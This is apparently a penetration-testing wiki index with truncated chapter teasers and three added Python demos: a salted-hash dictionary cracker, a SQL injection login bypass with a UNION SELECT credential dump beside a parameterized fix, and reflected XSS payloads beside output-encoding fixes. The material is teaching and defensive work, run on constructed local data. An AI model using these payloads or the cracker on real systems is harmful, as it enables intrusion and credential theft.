binsec wiki
The Hacking Guide
Looking back, the previous chapters covered the non-technical but essential aspects of penetration testing. In a …
Hacking I: Scanning networks
In some cases, we need to identify the network ranges of a company ourselves for penetration testing. In the case …
Tool introduction: nmap
To identify accessible servers in a network range, nmap can perform a ping sweep, which by default uses ICMP echo requests (and, when run with raw-socket privileges, additional TCP and ICMP probes). In this …
Tool introduction: masscan
When performing a port scan against an IT infrastructure, we must assume that services can be accessed via any IP …
Tool introduction: netcat
Now that we are able to identify open ports and accessible services on a target system, we can also communicate …
Tool introduction: dig
The domain name can provide important information about the role of a target system: as humans have a hard time …
Particularities of IPv6 networks
Nowadays, scanning only the IPv4 address space is no longer sufficient. Many companies are gradually migrating …
Hacking II: Password attacks
To recap, scanning networks is the foundation of any attack, since it reveals our attack surface. But …
Online password attacks
Network services usually authenticate their users by means of a user name and associated password. If we know of the …
Offline password attacks
Unlike online password attacks, offline password attacks start from the hashes of the user passwords rather than from a live login service. A cryptographic hash function …
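The following dictionary attack against a dumped credential table is an added example and not code from the wiki: it recomputes hash candidates from a wordlist with a small rule set and compares them against the stored digests. The storage format (hex SHA-256 over salt concatenated with password), the dump contents and the wordlist are all constructed for this example and stand in for a real dump and rockyou.txt.

```python
import hashlib
from typing import Dict, Iterator, Optional, Tuple


def hash_password(salt: str, password: str) -> str:
    """Storage format assumed for this example: hex(SHA-256(salt || password))."""
    return hashlib.sha256((salt + password).encode("utf-8")).hexdigest()


# Constructed credential dump in the form user -> "salt$digest" (data invented for this example).
LEAKED: Dict[str, str] = {
    "alice": "c0ffee$" + hash_password("c0ffee", "summer2021"),
    "bob": "d34db33f$" + hash_password("d34db33f", "Qwerty1"),
    "carol": "8badf00d$" + hash_password("8badf00d", "Tr0ub4dor&3"),
}

# Tiny constructed wordlist standing in for a real one such as rockyou.txt.
WORDLIST = ["password", "letmein", "summer2021", "qwerty", "welcome"]


def mangle(word: str) -> Iterator[str]:
    """Rule-based candidate generation in the spirit of hashcat/john rules:
    case variants combined with common suffixes, each candidate yielded once."""
    seen = set()
    for base in (word, word.capitalize(), word.upper()):
        for suffix in ("", "1", "123", "!", "2021"):
            candidate = base + suffix
            if candidate not in seen:
                seen.add(candidate)
                yield candidate


def crack(leaked: Dict[str, str], wordlist) -> Tuple[Dict[str, Optional[str]], int]:
    """Dictionary attack: hash every candidate with the user's salt and compare with the dump.
    Returns the recovered passwords (None where nothing matched) and the number of hash
    computations, which shows the cost that a per-user salt imposes: no work is shared
    between users, every candidate is hashed again for each salt."""
    recovered: Dict[str, Optional[str]] = {}
    attempts = 0
    for user, entry in leaked.items():
        salt, digest = entry.split("$", 1)
        recovered[user] = None
        for word in wordlist:
            for candidate in mangle(word):
                attempts += 1
                if hash_password(salt, candidate) == digest:
                    recovered[user] = candidate
                    break
            if recovered[user] is not None:
                break
    return recovered, attempts


if __name__ == "__main__":
    found, n = crack(LEAKED, WORDLIST)
    for user, pw in found.items():
        print(f"{user}: {pw if pw else '<not in wordlist>'}")
    print(f"{n} hash computations")
```

Fast hashes such as SHA-256 make this attack cheap; the defensive counterpart is a deliberately slow, salted password hash (bcrypt, scrypt or Argon2), which turns every one of those hash computations into a much more expensive operation for the attacker as well.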
Hacking III: Web application attacks
User authentication by password is often implemented in web applications. Individual users may be assigned different roles. As a payment …
Broken Access Control
In 2021, vulnerabilities in the authorization scheme (Broken Access Control) were ranked as the top risk in web applications by the OWASP Top 10 …
SQL Injections (SQLi)
According to the OWASP Top 10, injection is one of the three most critical risk categories for web applications. This also includes …
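As an added example (not code from the wiki), the following script builds an in-memory SQLite database and shows a login query assembled by string concatenation next to its parameterized counterpart. The table layout, the users and the plaintext password column are constructed for the demonstration only; a real application would store password hashes as discussed in the previous chapter.

```python
import sqlite3
from typing import List, Optional, Tuple


def setup_db() -> sqlite3.Connection:
    """Constructed sample schema and data for this example."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password, role) VALUES (?, ?, ?)",
        [("admin", "s3cret", "admin"), ("alice", "summer2021", "user")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> Optional[Tuple[str, str]]:
    """Vulnerable: user input is pasted into the SQL statement, so the input
    username = "admin' --" comments out the password check."""
    query = (
        "SELECT username, role FROM users WHERE username = '%s' AND password = '%s'"
        % (username, password)
    )
    return conn.execute(query).fetchone()


def dump_vulnerable(conn: sqlite3.Connection) -> List[Tuple[str, str]]:
    """Same flaw, used for data extraction: a UNION SELECT with the same number of
    columns appends every stored username/password pair to the result set."""
    payload = "' UNION SELECT username, password FROM users --"
    query = (
        "SELECT username, role FROM users WHERE username = '%s' AND password = '%s'"
        % (payload, "")
    )
    return sorted(conn.execute(query).fetchall())


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> Optional[Tuple[str, str]]:
    """Fixed: a parameterized query. The driver passes the values separately from
    the statement, so quotes and comment markers in the input stay data."""
    return conn.execute(
        "SELECT username, role FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()


if __name__ == "__main__":
    db = setup_db()
    print("bypass:", login_vulnerable(db, "admin' --", "wrong"))
    print("dump:", dump_vulnerable(db))
    print("safe:", login_safe(db, "admin' --", "wrong"))
```

Note that the UNION payload only works because the attacker guessed a matching column count and compatible types; in practice that is discovered with ORDER BY or incrementing UNION SELECT NULL probes. Parameterized queries close both the authentication bypass and the extraction.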
Cross-Site Scripting (XSS)
In addition to SQL injection, injection attacks also include cross-site scripting. Due to missing input validation and output encoding, cross-site scripting …
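The following is an added example, not code from the wiki: a search page that reflects a query parameter into its HTML, rendered unsafely and with output encoding, in both the body and the attribute context. The payloads and the tiny page template are constructed; the small parser at the end uses Python's html.parser to check what a browser would see as markup.

```python
import html
from html.parser import HTMLParser
from typing import Dict

# Constructed proof-of-concept payloads.
SCRIPT_PAYLOAD = "<script>alert(1)</script>"
ATTR_PAYLOAD = "x onmouseover=alert(1)"


def render_unsafe(query: str) -> str:
    """Reflects the search term verbatim into the HTML body: reflected XSS."""
    return f"<p>Results for: {query}</p>"


def render_escaped(query: str) -> str:
    """Output encoding for the body context: < > & \" ' become entities."""
    return f"<p>Results for: {html.escape(query)}</p>"


def render_attr_unquoted(query: str) -> str:
    """Escaping alone is not enough in an unquoted attribute: a space ends the
    value, and the remainder of the input becomes a new attribute."""
    return f'<input type="text" name="q" value={html.escape(query)}>'


def render_attr_quoted(query: str) -> str:
    """Quoted attribute plus escaping (quote=True is the default, so double
    quotes are encoded) keeps the whole input inside the value."""
    return f'<input type="text" name="q" value="{html.escape(query)}">'


class MarkupInspector(HTMLParser):
    """Records how many <script> start tags the parser sees and the attributes
    of the <input> element, i.e. what a browser would interpret as markup."""

    def __init__(self) -> None:
        super().__init__()
        self.scripts = 0
        self.input_attrs: Dict[str, str] = {}

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts += 1
        if tag == "input":
            self.input_attrs = {k: (v or "") for k, v in attrs}


def inspect(rendered: str) -> MarkupInspector:
    parser = MarkupInspector()
    parser.feed(rendered)
    parser.close()
    return parser


if __name__ == "__main__":
    for name, page in [
        ("body unsafe", render_unsafe(SCRIPT_PAYLOAD)),
        ("body escaped", render_escaped(SCRIPT_PAYLOAD)),
        ("attr unquoted", render_attr_unquoted(ATTR_PAYLOAD)),
        ("attr quoted", render_attr_quoted(ATTR_PAYLOAD)),
    ]:
        r = inspect(page)
        print(f"{name:14} scripts={r.scripts} input_attrs={r.input_attrs}")
```

The attribute case is the one that trips up developers who believe "I escaped it": encoding must match the context the value lands in (HTML body, quoted attribute, URL, JavaScript string), and quoting attributes is part of the fix, not an optional style choice.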
Hacking IV: Privilege Escalation
We have successfully mastered our first step as an attacker: executing commands on our target system. But in most cases, …
Information Gathering
The information-gathering phase is an important part of our process. We are especially looking for information concerning the …
Local Root Exploits
So-called local root exploits exist especially for older operating systems; they exploit vulnerabilities in the kernel to escalate privileges, …
File Transfer
After we have "built" an exploit locally on our attacking machine, we still have to transfer it to the target …
Hacking V: Tunnelling Techniques
We deliberately also kept an eye out for network information during privilege escalation, because IT infrastructure is often split into …
Hacking VI: Vulnerability scanner and penetration testing frameworks
It goes without saying that many processes in a penetration test can and should be automated. We can write scripts, …